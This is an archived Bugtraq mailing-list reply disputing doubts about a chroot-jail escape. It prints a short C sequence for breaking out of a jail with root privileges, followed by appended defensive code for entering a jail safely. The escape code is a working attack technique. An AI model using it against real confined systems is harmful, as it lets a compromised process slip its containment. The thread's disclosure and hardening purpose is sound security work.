Bugtraq mailing list archives

Re: response to the bugtraq report of buffer overruns in imapd LIST command


From: imp () VILLAGE ORG (Warner Losh)
Date: Tue, 18 Apr 2000 00:21:36 -0600


In message <MailManager.956021099.15421.mrc () Ikkoku-Kan Panda COM> Mark Crispin writes:
: Last but not least, I am very interested in Kris Kennaway's claim
: that "It may also be possible to break out of the chroot jail on
: some platforms."  If true, it represents a huge root-level security
: hole on those platforms.  I simply do not believe the claim.  I
: would like to know if there is some substance to this claim, or if
: it was mere speculation.

The claim is 100% real.  I have code that will do it, and the code has
been well known since at least the mid-1990s (when I first
encountered it) and likely dates back much further than that.

With root privs, it is definitely possible to break out of a chroot
jail by chrooting down a level or two, and then using chdir .. to
climb up to root, since that gives the user an access outside of the
jailed code.  It does require breaking root to do that, unless the
current directory is outside of the chroot'd location, in which case
anybody can do this.  The code is approximately:

        fd = open(".", O_RONLY);
        mkdir("foo");
        chroot("foo");          /* cwd now outside the jail */
        fchdir(fd);
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");            /* Most likely at / now */
        chroot(".");

More subtle ways to deal with the finding / problem are left as an
exercise to the reader.

Believe what you will, this is true.  Variations on the above code
work on all systems I've tried it on, except for FreeBSD's jail code.

Warner
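The defensive counterpart to the sequence above, added here as an example and not code from this thread or from any imapd: a daemon that chroots should chdir("/") only after chroot() and then give up root, because the escape needs both a cwd outside the jail and the ability to call chroot() again. The function names enter_jail, drop_privileges and can_regain_root are my own.

```c
#define _DEFAULT_SOURCE
#include <errno.h>
#include <grp.h>
#include <sys/types.h>
#include <unistd.h>

/* Permanently give up root: clear supplementary groups, set gid, then uid.
 * Returns 0 on success, -1 (errno set) on failure.  Only root may clear
 * supplementary groups, so that step is skipped when already unprivileged. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && setgroups(0, NULL) == -1)
        return -1;
    if (setgid(gid) == -1)      /* gid first: after setuid() it is no longer allowed */
        return -1;
    if (setuid(uid) == -1)
        return -1;
    return 0;
}

/* 1 if the process can still become root (setuid(0) succeeds), else 0.
 * A correctly confined daemon must report 0. */
int can_regain_root(void)
{
    return setuid(0) == 0;
}

/* Confine the process to `jail` and drop to uid/gid in the order that
 * defeats the escape quoted above: chdir("/") AFTER chroot() so the cwd is
 * inside the new root, then discard root so a second chroot() is impossible. */
int enter_jail(const char *jail, uid_t uid, gid_t gid)
{
    if (chroot(jail) == -1)
        return -1;
    if (chdir("/") == -1)       /* never leave the cwd outside the jail */
        return -1;
    if (drop_privileges(uid, gid) == -1)
        return -1;
    if (uid != 0 && can_regain_root()) {
        errno = EPERM;          /* privileges did not stick: treat as fatal */
        return -1;
    }
    return 0;
}
```

Since the escape also relies on a directory descriptor opened before chroot(), a daemon should close inherited descriptors before calling enter_jail().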

